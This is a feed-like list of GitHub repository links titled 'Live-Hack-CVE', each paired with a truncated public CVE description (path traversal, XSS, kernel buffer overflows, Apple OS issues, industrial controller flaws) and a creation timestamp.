**U-Office Force Download function has a path traversal vulnerability. A remote attacker with general user privilege can exploit this vulnerability to download arbitrary system file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39023](https://github.com/Live-Hack-CVE/CVE-2022-39023) create time: 2022-12-28T16:23:07Z

**U-Office Force Download function has a path traversal vulnerability. A remote attacker with general user privilege can exploit this vulnerability to download arbitrary system file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39022](https://github.com/Live-Hack-CVE/CVE-2022-39022) create time: 2022-12-28T16:23:04Z

**U-Office Force Forum function has insufficient filtering for special characters. A remote attacker with general user privilege can inject JavaScript and perform XSS (Stored Cross-Site Scripting) attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39027](https://github.com/Live-Hack-CVE/CVE-2022-39027) create time: 2022-12-28T16:23:00Z

**U-Office Force UserDefault page has insufficient filtering for special characters in the HTTP header fields. A remote attacker with general user privilege can exploit this vulnerability to inject JavaScript and perform XSS (Stored Cross-Site Scripting) attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39026](https://github.com/Live-Hack-CVE/CVE-2022-39026) create time: 2022-12-28T16:22:57Z

**DataHub is an open-source metadata platform. Prior to version 0.8.45, the `StatelessTokenService` of the DataHub metadata service (GMS) does not verify the signature of JWT tokens. This allows an attacker to connect to DataHub instances as any user if Metadata Service authentication is enabled. This vulnerability occur CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39366](https://github.com/Live-Hack-CVE/CVE-2022-39366) create time: 2022-12-28T16:22:53Z

**aspnet_wp.exe in Microsoft ASP.NET web services allows remote attackers to cause a denial of service (CPU consumption from infinite loop) via a crafted SOAP message to an RPC/Encoded method. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2005-2224](https://github.com/Live-Hack-CVE/CVE-2005-2224) create time: 2022-12-28T15:02:55Z

**Directory traversal vulnerability in download_view_attachment.aspx in AfterLogic MailBee WebMail Pro 4.1 for ASP.NET allows remote attackers to read arbitrary files via a .. (dot dot) in the temp_filename parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-0333](https://github.com/Live-Hack-CVE/CVE-2008-0333) create time: 2022-12-28T15:02:51Z

**Adobe Shockwave Player before 11.5.7.609 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted FFFFFF45h Shockwave 3D blocks in a Shockwave file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-0127](https://github.com/Live-Hack-CVE/CVE-2010-0127) create time: 2022-12-28T14:19:47Z

**Integer overflow in Adobe Shockwave Player before 11.5.7.609 might allow remote attackers to execute arbitrary code via a crafted .dir (aka Director) file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-0130](https://github.com/Live-Hack-CVE/CVE-2010-0130) create time: 2022-12-28T14:19:43Z

**Adobe Shockwave Player before 11.5.7.609 does not properly process asset entries, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted Shockwave file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-0986](https://github.com/Live-Hack-CVE/CVE-2010-0986) create time: 2022-12-28T14:19:37Z

**Heap-based buffer overflow in Adobe Shockwave Player before 11.5.7.609 might allow remote attackers to execute arbitrary code via crafted embedded fonts in a Shockwave file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-0987](https://github.com/Live-Hack-CVE/CVE-2010-0987) create time: 2022-12-28T14:19:33Z

**In the Linux kernel before 3.1, an off by one in the drivers/target/loopback/tcm_loop.c tcm_loop_make_naa_tpg() function could result in at least memory corruption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-5327](https://github.com/Live-Hack-CVE/CVE-2011-5327) create time: 2022-12-28T14:59:18Z

**Integer signedness error in the CIFSFindNext function in fs/cifs/cifssmb.c in the Linux kernel before 3.1 allows remote CIFS servers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a large length value in a response to a read request for a directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-3191](https://github.com/Live-Hack-CVE/CVE-2011-3191) create time: 2022-12-28T14:58:57Z

**In the Linux kernel before 3.4, a buffer overflow occurs in drivers/net/wireless/iwlwifi/iwl-agn-sta.c, which will cause at least memory corruption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-6712](https://github.com/Live-Hack-CVE/CVE-2012-6712) create time: 2022-12-28T14:59:15Z

**The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature ve CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-3900](https://github.com/Live-Hack-CVE/CVE-2013-3900) create time: 2022-12-28T15:05:25Z

**drivers/staging/ozwpan/ozusbsvc1.c in the OZWPAN driver in the Linux kernel through 4.0.5 does not ensure that certain length values are sufficiently large, which allows remote attackers to cause a denial of service (system crash or large loop) or possibly execute arbitrary code via a crafted packet, related to the (1) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4002](https://github.com/Live-Hack-CVE/CVE-2015-4002) create time: 2022-12-28T14:59:25Z

**In the Linux kernel before 4.14, an out of boundary access happened in drivers/nvme/target/fc.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-18379](https://github.com/Live-Hack-CVE/CVE-2017-18379) create time: 2022-12-28T14:59:11Z

**The ip6gre_err function in net/ipv6/ip6_gre.c in the Linux kernel allows remote attackers to have unspecified impact via vectors involving GRE flags in an IPv6 packet, which trigger an out-of-bounds access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-5897](https://github.com/Live-Hack-CVE/CVE-2017-5897) create time: 2022-12-28T14:58:54Z

**The __skb_flow_dissect function in net/core/flow_dissector.c in the Linux kernel before 4.3 does not ensure that n_proto, ip_proto, and thoff are initialized, which allows remote attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a single crafted MPLS packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-13715](https://github.com/Live-Hack-CVE/CVE-2017-13715) create time: 2022-12-28T14:58:24Z

**An issue was discovered in the Linux kernel before 4.20. There is a race condition in smp_task_timedout() and smp_task_done() in drivers/scsi/libsas/sas_expander.c, leading to a use-after-free. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-20836](https://github.com/Live-Hack-CVE/CVE-2018-20836) create time: 2022-12-28T14:59:01Z

**The Bluetooth Low Energy implementation on NXP SDK through 2.2.1 for KW41Z devices does not properly restrict the Link Layer payload length, allowing attackers in radio range to cause a buffer overflow via a crafted packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17519](https://github.com/Live-Hack-CVE/CVE-2019-17519) create time: 2022-12-28T15:05:32Z

**The Bluetooth Low Energy (BLE) stack implementation on the NXP KW41Z (based on the MCUXpresso SDK with Bluetooth Low Energy Driver 2.2.1 and earlier) does not properly restrict the BLE Link Layer header and executes certain memory contents upon receiving a packet with a Link Layer ID (LLID) equal to zero. This allows a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17060](https://github.com/Live-Hack-CVE/CVE-2019-17060) create time: 2022-12-28T15:05:29Z

**Amazon FreeRTOS up to and including v1.4.8 lacks length checking in prvProcessReceivedPublish, resulting in untargetable leakage of arbitrary memory contents on a device to an attacker. If an attacker has the authorization to send a malformed MQTT publish packet to an Amazon IoT Thing, which interacts with an associate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13120](https://github.com/Live-Hack-CVE/CVE-2019-13120) create time: 2022-12-28T15:05:22Z

**A flaw was found in the Linux kernel. A heap based buffer overflow in mwifiex_uap_parse_tail_ies function in drivers/net/wireless/marvell/mwifiex/ie.c might lead to memory corruption and possibly other consequences. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10126](https://github.com/Live-Hack-CVE/CVE-2019-10126) create time: 2022-12-28T14:59:21Z

**An issue was discovered in net/wireless/nl80211.c in the Linux kernel through 5.2.17. It does not check the length of variable elements in a beacon head, leading to a buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16746](https://github.com/Live-Hack-CVE/CVE-2019-16746) create time: 2022-12-28T14:58:36Z

**Linux kernel CIFS implementation, version 4.9.0 is vulnerable to a relative paths injection in directory entry lists. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10220](https://github.com/Live-Hack-CVE/CVE-2019-10220) create time: 2022-12-28T14:58:32Z

**In the Linux kernel through 5.3.2, cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c does not reject a long SSID IE, leading to a Buffer Overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17133](https://github.com/Live-Hack-CVE/CVE-2019-17133) create time: 2022-12-28T14:58:28Z

**A stack-based buffer overflow was found in the Linux kernel, version kernel-2.6.32, in Marvell WiFi chip driver. An attacker is able to cause a denial of service (system crash) or, possibly execute arbitrary code, when a STA works in IBSS mode (allows connecting stations together without the use of an AP) and connects CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14897](https://github.com/Live-Hack-CVE/CVE-2019-14897) create time: 2022-12-28T14:58:17Z

**A heap-based buffer overflow was discovered in the Linux kernel, all versions 3.x.x and 4.x.x before 4.18.0, in Marvell WiFi chip driver. The flaw could occur when the station attempts a connection negotiation during the handling of the remote devices country settings. This could allow the remote device to cause a deni CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14895](https://github.com/Live-Hack-CVE/CVE-2019-14895) create time: 2022-12-28T14:57:59Z

**A vulnerability was found in Axiomatic Bento4. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Incomplete Fix CVE-2019-13238. The manipulation leads to resource consumption. The attack may be launched remotely. The exploit has been disclosed to the public and may CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3807](https://github.com/Live-Hack-CVE/CVE-2022-3807) create time: 2022-12-28T14:21:37Z

**LibreOffice has a feature where documents can specify that pre-installed macros can be executed on various script events such as mouse-over, document-open etc. Access is intended to be restricted to scripts under the share/Scripts/python, user/Scripts/python sub-directories of the LibreOffice install. Protection was ad CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9852](https://github.com/Live-Hack-CVE/CVE-2019-9852) create time: 2022-12-28T14:19:26Z

**The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25013](https://github.com/Live-Hack-CVE/CVE-2019-25013) create time: 2022-12-28T14:17:17Z

**libde265 v1.0.4 contains a heap buffer overflow in the put_epel_hv_fallback function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21594](https://github.com/Live-Hack-CVE/CVE-2020-21594) create time: 2022-12-28T15:00:50Z

**libde265 v1.0.4 contains a heap buffer overflow fault in the _mm_loadl_epi64 function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21604](https://github.com/Live-Hack-CVE/CVE-2020-21604) create time: 2022-12-28T15:00:46Z

**libde265 v1.0.4 contains a heap buffer overflow fault in the put_epel_16_fallback function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21606](https://github.com/Live-Hack-CVE/CVE-2020-21606) create time: 2022-12-28T15:00:39Z

**libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_bipred_16_fallback function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21602](https://github.com/Live-Hack-CVE/CVE-2020-21602) create time: 2022-12-28T15:00:27Z

**libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_pred_avg_16_fallback function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21600](https://github.com/Live-Hack-CVE/CVE-2020-21600) create time: 2022-12-28T15:00:24Z

**libde265 v1.0.4 contains a heap buffer overflow in the ff_hevc_put_unweighted_pred_8_sse function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21598](https://github.com/Live-Hack-CVE/CVE-2020-21598) create time: 2022-12-28T15:00:20Z

**libde265 v1.0.4 contains a global buffer overflow in the decode_CABAC_bit function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21596](https://github.com/Live-Hack-CVE/CVE-2020-21596) create time: 2022-12-28T15:00:17Z

**libde265 v1.0.4 contains a heap buffer overflow in the mc_chroma function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21597](https://github.com/Live-Hack-CVE/CVE-2020-21597) create time: 2022-12-28T15:00:13Z

**libde265 v1.0.4 contains a segmentation fault in the apply_sao_internal function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21605](https://github.com/Live-Hack-CVE/CVE-2020-21605) create time: 2022-12-28T15:00:10Z

**libde265 v1.0.4 contains a heap buffer overflow in the put_qpel_0_0_fallback_16 function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21603](https://github.com/Live-Hack-CVE/CVE-2020-21603) create time: 2022-12-28T15:00:06Z

**libde265 v1.0.4 contains a stack buffer overflow in the put_qpel_fallback function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21601](https://github.com/Live-Hack-CVE/CVE-2020-21601) create time: 2022-12-28T15:00:01Z

**libde265 v1.0.4 contains a heap buffer overflow in the mc_luma function, which can be exploited via a crafted a file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21595](https://github.com/Live-Hack-CVE/CVE-2020-21595) create time: 2022-12-28T14:59:29Z

**An issue was discovered in the v9 crate through 2020-12-18 for Rust. There is an unconditional implementation of Sync for SyncRef<T>. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36447](https://github.com/Live-Hack-CVE/CVE-2020-36447) create time: 2022-12-28T14:58:14Z

**A vulnerability, which was classified as problematic, has been found in Tribal Systems Zenario CMS. Affected by this issue is some unknown functionality of the file admin_organizer.js of the component Error Log Module. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36608](https://github.com/Live-Hack-CVE/CVE-2020-36608) create time: 2022-12-28T14:21:26Z

**The application was signed using a key length less than or equal to 1024 bits, making it potentially vulnerable to forged digital signatures. An attacker could forge the same digital signature of the app after maliciously modifying the app. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-4099](https://github.com/Live-Hack-CVE/CVE-2020-4099) create time: 2022-12-28T14:21:05Z

**Valve's Game Networking Sockets prior to version v1.2.0 improperly handles inlined statistics messages in function CConnectionTransportUDPBase::Received_Data(), leading to an exception thrown from libprotobuf and resulting in a crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6019](https://github.com/Live-Hack-CVE/CVE-2020-6019) create time: 2022-12-28T14:19:15Z

**IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 176609. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-4301](https://github.com/Live-Hack-CVE/CVE-2020-4301) create time: 2022-12-28T14:18:09Z

**MKCMS V6.2 has SQL injection via /ucenter/reg.php name parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22818](https://github.com/Live-Hack-CVE/CVE-2020-22818) create time: 2022-12-28T14:17:31Z

**The provided HCL Launch Container images contain non-unique HTTPS certificates and a database encryption key. The fix provides directions and tools to replace the non-unique keys and certificates. This does not affect the standard installer packages. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27784](https://github.com/Live-Hack-CVE/CVE-2021-27784) create time: 2022-12-28T15:06:14Z

**A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40661](https://github.com/Live-Hack-CVE/CVE-2021-40661) create time: 2022-12-28T15:04:23Z

**Honeywell Experion PKS C200, C200E, C300, and ACE controllers are vulnerable to relative path traversal, which may allow an attacker access to unauthorized files and directories. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38399](https://github.com/Live-Hack-CVE/CVE-2021-38399) create time: 2022-12-28T15:02:23Z

**Honeywell Experion PKS C200, C200E, C300, and ACE controllers are vulnerable to unrestricted file uploads, which may allow an attacker to remotely execute arbitrary code and cause a denial-of-service condition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38397](https://github.com/Live-Hack-CVE/CVE-2021-38397) create time: 2022-12-28T15:02:11Z

**Honeywell Experion PKS C200, C200E, C300, and ACE controllers are vulnerable to improper neutralization of special elements in output, which may allow an attacker to remotely execute arbitrary code and cause a denial-of-service condition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38395](https://github.com/Live-Hack-CVE/CVE-2021-38395) create time: 2022-12-28T15:02:07Z

**An issue was discovered in the tokio crate before 1.8.1 for Rust. Upon a JoinHandle::abort, a Task may be dropped in the wrong thread. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38191](https://github.com/Live-Hack-CVE/CVE-2021-38191) create time: 2022-12-28T14:58:07Z

**An issue was discovered in net/tipc/crypto.c in the Linux kernel before 5.14.16. The Transparent Inter-Process Communication (TIPC) functionality allows remote attackers to exploit insufficient validation of user-supplied sizes for the MSG_CRYPTO message type. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43267](https://github.com/Live-Hack-CVE/CVE-2021-43267) create time: 2022-12-28T14:58:03Z

**stb_image.h 2.27 has a heap-based buffer over in stbi__jpeg_load, leading to Information Disclosure or Denial of Service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37789](https://github.com/Live-Hack-CVE/CVE-2021-37789) create time: 2022-12-28T14:23:01Z

**VMware Workspace ONE Access 21.08, 20.10.0.1, and 20.10 contain an authentication bypass vulnerability. A malicious actor, who has successfully provided first-factor authentication, may be able to obtain second-factor authentication provided by VMware Verify. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22057](https://github.com/Live-Hack-CVE/CVE-2021-22057) create time: 2022-12-28T14:19:08Z

**IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 196825. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20468](https://github.com/Live-Hack-CVE/CVE-2021-20468) create time: 2022-12-28T14:18:06Z

**IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 could allow a local attacker to obtain information due to the autocomplete feature on password input fields. IBM X-Force ID: 214345. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39045](https://github.com/Live-Hack-CVE/CVE-2021-39045) create time: 2022-12-28T14:17:55Z

**IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 stores user credentials in plain clear text which can be read by a local privileged user. IBM X-Force ID: 213554. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39009](https://github.com/Live-Hack-CVE/CVE-2021-39009) create time: 2022-12-28T14:17:52Z

**IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 204465. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29823](https://github.com/Live-Hack-CVE/CVE-2021-29823) create time: 2022-12-28T14:17:48Z

**In the standard library in Rust before 1.52.0, the Zip implementation can report an incorrect size due to an integer overflow. This bug can lead to a buffer overflow when a consumed Zip iterator is used again. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28879](https://github.com/Live-Hack-CVE/CVE-2021-28879) create time: 2022-12-28T14:17:27Z

**In the standard library in Rust before 1.52.0, a double free can occur in the Vec::from_iter function if freeing the element panics. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31162](https://github.com/Live-Hack-CVE/CVE-2021-31162) create time: 2022-12-28T14:17:24Z

**In the standard library in Rust before 1.51.0, the Zip implementation calls __iterator_get_unchecked() for the same index more than once when nested. This bug can lead to a memory safety violation due to an unmet safety requirement for the TrustedRandomAccess trait. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28877](https://github.com/Live-Hack-CVE/CVE-2021-28877) create time: 2022-12-28T14:17:20Z

**In the standard library in Rust before 1.52.0, the Zip implementation calls __iterator_get_unchecked() more than once for the same index (under certain conditions) when next_back() and next() are used together. This bug could lead to a memory safety violation due to an unmet safety requirement for the TrustedRandomAcce CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28878](https://github.com/Live-Hack-CVE/CVE-2021-28878) create time: 2022-12-28T14:17:14Z

**Crash in DNP dissector in Wireshark 3.4.0 to 3.4.6 and 3.2.0 to 3.2.14 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22235](https://github.com/Live-Hack-CVE/CVE-2021-22235) create time: 2022-12-28T14:17:10Z

**In the standard library in Rust before 1.52.0, the Zip implementation has a panic safety issue. It calls __iterator_get_unchecked() more than once for the same index when the underlying iterator panics (in certain conditions). This bug could lead to a memory safety violation due to an unmet safety requirement for the T CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28876](https://github.com/Live-Hack-CVE/CVE-2021-28876) create time: 2022-12-28T14:17:04Z

**In the standard library in Rust before 1.50.0, read_to_end() does not validate the return value from Read in an unsafe context. This bug could lead to a buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28875](https://github.com/Live-Hack-CVE/CVE-2021-28875) create time: 2022-12-28T14:17:01Z

**A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. An app may be able to leak sensitive user information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32823](https://github.com/Live-Hack-CVE/CVE-2022-32823) create time: 2022-12-28T15:08:09Z

**The issue was addressed with improved memory handling. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. An app with root privileges may be able to execute arbitrary code with kernel privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32832](https://github.com/Live-Hack-CVE/CVE-2022-32832) create time: 2022-12-28T15:08:04Z

**An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Security Update 2022-005 Catalina, macOS Big Sur 11.6.8, macOS Monterey 12.5. Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32831](https://github.com/Live-Hack-CVE/CVE-2022-32831) create time: 2022-12-28T15:08:00Z

**An authorization issue was addressed with improved state management. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. An app may be able to gain root privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32826](https://github.com/Live-Hack-CVE/CVE-2022-32826) create time: 2022-12-28T15:07:57Z

**The issue was addressed with improved handling of caches. This issue is fixed in Security Update 2022-005 Catalina, macOS Big Sur 11.6.8, macOS Monterey 12.5. An app may be able to access sensitive user information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32805](https://github.com/Live-Hack-CVE/CVE-2022-32805) create time: 2022-12-28T15:07:53Z

**An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. An app may be able to execute arbitrary code with kernel privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32820](https://github.com/Live-Hack-CVE/CVE-2022-32820) create time: 2022-12-28T15:07:50Z

**A logic issue was addressed with improved state management. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. An app may be able to gain root privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32819](https://github.com/Live-Hack-CVE/CVE-2022-32819) create time: 2022-12-28T15:07:46Z

**This issue was addressed with improved checks. This issue is fixed in Security Update 2022-005 Catalina, macOS Big Sur 11.6.8, macOS Monterey 12.5. An app may be able to modify protected parts of the file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32800](https://github.com/Live-Hack-CVE/CVE-2022-32800) create time: 2022-12-28T15:07:43Z

**An out-of-bounds read issue was addressed with improved bounds checking. This issue is fixed in Security Update 2022-005 Catalina, macOS Monterey 12.5. A user in a privileged network position may be able to leak sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32799](https://github.com/Live-Hack-CVE/CVE-2022-32799) create time: 2022-12-28T15:07:39Z

**The issue was addressed with improved memory handling. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. An app with root privileges may be able to execute arbitrary code with kernel privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32815](https://github.com/Live-Hack-CVE/CVE-2022-32815) create time: 2022-12-28T15:07:04Z

**This issue was addressed with improved file handling. This issue is fixed in Security Update 2022-005 Catalina, macOS Big Sur 11.6.8, macOS Monterey 12.5. An app may be able to overwrite arbitrary files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32807](https://github.com/Live-Hack-CVE/CVE-2022-32807) create time: 2022-12-28T15:07:01Z

**This issue was addressed with improved checks. This issue is fixed in Security Update 2022-005 Catalina, macOS Big Sur 11.6.8, macOS Monterey 12.5. Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32797](https://github.com/Live-Hack-CVE/CVE-2022-32797) create time: 2022-12-28T15:06:57Z

**This issue was addressed with improved checks. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, macOS Big Sur 11.6.6, Security Update 2022-004 Catalina. A remote user may be able to cause a denial-of-service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32790](https://github.com/Live-Hack-CVE/CVE-2022-32790) create time: 2022-12-28T15:06:53Z

**An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. Processing maliciously crafted web content may lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32787](https://github.com/Live-Hack-CVE/CVE-2022-32787) create time: 2022-12-28T15:06:50Z

**An issue in the handling of environment variables was addressed with improved validation. This issue is fixed in Security Update 2022-005 Catalina, macOS Big Sur 11.6.8, macOS Monterey 12.5. An app may be able to modify protected parts of the file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32786](https://github.com/Live-Hack-CVE/CVE-2022-32786) create time: 2022-12-28T15:06:46Z

**A null pointer dereference was addressed with improved validation. This issue is fixed in iOS 15.6 and iPadOS 15.6, Security Update 2022-005 Catalina, macOS Big Sur 11.6.8, macOS Monterey 12.5. Processing an image may lead to a denial-of-service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32785](https://github.com/Live-Hack-CVE/CVE-2022-32785) create time: 2022-12-28T15:06:43Z

**This issue was addressed by enabling hardened runtime. This issue is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5, Security Update 2022-005 Catalina, macOS Big Sur 11.6.8. An app with root privileges may be able to access private information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32781](https://github.com/Live-Hack-CVE/CVE-2022-32781) create time: 2022-12-28T15:06:39Z

**Delta Electronics InfraSuite Device Master versions 00.00.01a and prior deserialize network packets without proper verification. If the device connects to an attacker-controlled server, the attacker could send maliciously crafted packets that would be deserialized and executed, leading to remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41779](https://github.com/Live-Hack-CVE/CVE-2022-41779) create time: 2022-12-28T15:06:36Z

**Delta Electronics InfraSuite Device Master versions 00.00.01a and prior allow unauthenticated users to trigger the WriteConfiguration method, which could allow an attacker to provide new values for user configuration files such as UserListInfo.xml. This could lead to the changing of administrative passwords. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41776](https://github.com/Live-Hack-CVE/CVE-2022-41776) create time: 2022-12-28T15:06:32Z

